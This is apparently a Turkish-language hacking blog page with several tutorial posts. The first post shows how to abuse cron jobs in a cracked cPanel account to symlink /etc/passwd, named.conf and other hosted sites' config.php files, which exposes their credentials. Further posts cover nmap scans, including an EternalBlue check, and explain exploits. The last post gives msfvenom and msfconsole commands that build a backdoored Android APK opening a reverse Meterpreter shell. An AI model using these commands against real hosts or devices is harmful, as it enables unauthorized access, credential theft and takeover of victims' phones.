Newest Post
Merhaba arkadaşlar bugün sizlere
cron job bypass ile /etc/passwd okunmayan serverlerde /etc/passwd okumayı anlatacağım
öncelikle sitemizde bakıyoruz /etc/passwd hepsini okuyamıyoruz
şimdi cpanele gidelim tabi cpaneli cracklemeniz lazım
alt kısımda cron jobs buluyoruz arkadaşlar
şimdi yukarıda email kısmı var buraya sallama bir mail girin maille işimiz yok
Once Per Minute seçin şimdi aşağıda command kısmı var işimiz orayla
Kod:
ln -s /etc/passwd 1.txt
komutumuz bu arkadaşlar bu komut sayesinde filemanagerde 1.txt oluşacak ve bize /etc/passwd okuma şansı sunacak
Filemanagere gidiyoruz dosya hemen oluşmaz arkadaşlar sayfayı yeniliyoruz
30-40 sn sonra oluşuyor
dosyaya tıklayıp editi seçiyoruz
gördüğünüz gibi tüm /etc/passwd okuduk
aynı şekilde
Kod:
ln -s /etc/named.conf 2.txt
ile named.conf okuduk
gördüğünüz gibi arkadaşlar
burdan sonrası sizde
named.conf dan user olan siteyi bulup aynı şekilde config bilgilerini
çekebilirsiniz
örnek sitemiz MyBB forum
user --> kartal
ln -s /home/kartal/public_html/inc/config.php 3.txt
şeklinde sitenin config bilgilerini alabilirsiniz
Tag :// apache bypass,
Tag :// bypass,
Tag :// Cloudlinux Server,
Tag :// Cloudlinux Server bypass,
Tag :// Cron Job,
Tag :// Cron Job bypass,
Tag :// litespeed bypass,
Tag :// server bypass
Bu özet kullanılabilir değil. Yayını görüntülemek için lütfen
burayı tıklayın.
Nmap versiyon ve port öğrenmeyle alakalı bir Ağ Haritası(Network Mapper) programıdır.
Nmap ile portları bulabilir , kullanılan sürümleri öğrenebilir ve servis isimlerini tarayabilirsiniz.
Kendi içinde bulunan script özelliği sayesinde belli sürümlerdeki zafiyetleri programı kullanarak test edebilirsiniz.
Nmap Komutları
-sV = serviceVersion yani çalışan hizmetin sürümünü gösterir.
-A = OScan , işletim sistemi tahmin eder.
-F = Hızlı Taramaya yarar.
-T = T1’den T5’e kadar seviyesi vardır. Hızlandırır , pratikleştirir. T4 çok kullanılır.
-sS = Gizli tarama yapar.
Benim açık portları ve sürümleri , bilgilerini öğrenmek için kullandığım kod ;
nmap -sV -sS -n -T4 ip.ad.re.si şeklindedir.
Bu komut benim için stabil ve yeterli olmaktadır.
Nmap ile eternalblue exploit açığının olup olmadığını tespit etmek için ;
nmap -p445 --script smb-vuln-ms17-010 <ip>
şeklinde bir tarama yapmak gerekir.
Bunun gibi zafiyeti tespit edebileceğiniz bir çok script içinde barındırılmaktadır.
Nmap resmi websitesi :https://nmap.org/
Exploit Nedir ve Nasıl Kullanılır ?
Exploit ne demek? Zafiyet Sömürme,faydalanma,kötüye kullanmak gibi bu çeviriler arttırılabilir.
Exploit Nedir ?
Exploit(Zafiyet) belli sistemlerdeki zayıf noktanın tespit edilip zararlı işlemlerin gerçekleştirilmesidir.
Exploit Çeşitleri ;
Remote(Uzaktan) Exploit : İnternet üzerinde çalışan uygulamaları hedef alınmaktadır.
Local(Yerel) Exploit : Sistemin içindeyken yeterli haklar(user) yoktur ama local exploit sayesinde yeterli yetkiler(admin) alabilirsiniz.
Dos Exploit : Sistemi yavaşlatan , durduran , hizmet dışı bırakma görevlerini gerçekleştirir.
Exploit Nasıl Kullanılır ?
Exploit’i kullanmak için işletim sistemine ve çalıştırabileceğiniz bir yazılım dili gerekmektedir. Mesela bir .py(python) exploit çalıştıracaksanız. Remote veya Local exploit farketmeksizin python çalıştırabilecek bir ara uygulamaya sahip olmanız gerekiyor.
Exploitlerin kullanımları http://exploit-db.com ve https://cxsecurity.com/ gibi sitelerden kullanımlarını okuyarak (neredeyse hepsi ingilizce) adımları takip etmelisiniz. Eğer işletim sistemi olarak kali-linux bulunuyorsa metasploit ve manuel olarak exploitleri de programa gerek kalmadan kullanabilirsiniz , içinde yüklü gelir.
0Day Exploit Nedir ?
Deneyimli hackerların zararlı bir exploiti piyasaya sunması ve sistemlere büyük zararlar verilmesidir.
Halen büyük sistemlerde 0day açıkları bulunmaktadır. Ne zaman ne olacağı belli olmamaktadır.
Bu çalışmada msfconsole ve msfvenom kullanacağız. Bazı tanımlar var bunlara kısaca bahsedip geçeceğim. Sızma testi için bu tanımlar önemlidir.
Tanımlar :
A.Msfvenom
Hedef sistemin özelliklerine göre özelleştirilmiş backdoor oluşturma aracıdır.
B.Metasploit
Sunucu , web uygulamaları ve bilgi toplamada kullanılan bu çok işlevli araç sayesinde kullanacağımız rolü backconnect alıp , android payload ile daha sağlıklı bir şekilde cihazdan faydalanacağız.
C.Ağ
İki veya daha fazla teknolojik aletin birbiriyle iletişim kurmasını sağlayan bağlantıdır.Sızma testindeki rolü tersine bağlantı alma ve virüsü bulaştırmak için indirme/yükleme işlemlerini gerçekleştirmesidir.
Msfvenom
Aşağıda bir msfvenom ve menü çıktısı vardır program terminal üzerinden kullanılır. GUI veya görüntüsel bir işlevi yoktur.
Kullanacağımız Payload Reverse TCP bağlantısını kullanarak yapacağımız için ;
msfvenom –p android/meterpreter/reverse_tcp LHOST=BağlantıVerilecekIP LPORT=BağlantıVerilecekPORT R > /root/Desktop/dosyaismi.apk
Açıklama :
Android cihaz üzerinde sızma yapacağımız için payloadı
(-p) android/meterpreter/ belirledik.
Reverse_tcp yazmamızın amacı ise tersine bağlantı alırken tcp yöntemini kullanacağımız için.
LHOST= Dinleme yaptığınız ip.
LPORT= Tcp üzerinden alacağınız port numarası kapı açıp kullanabilmek için.
R > Dosyayı çıkar → Nereye → /root/Desktop/buraya.apk
Kullanıcı burada exploit ve payload belirleyip sızma testi yapmaktadır.
Android için kullanılan msfconsole komutları :
use exploit/multi/handler
set Payload android/meterpreter/reverse_tcp
ve son olarak exploit komutu ile exploitini çalıştırır.
Eğer doğru bağlantılar ve zemin sağlandıysa cihazda yetkili kişi haline gelir.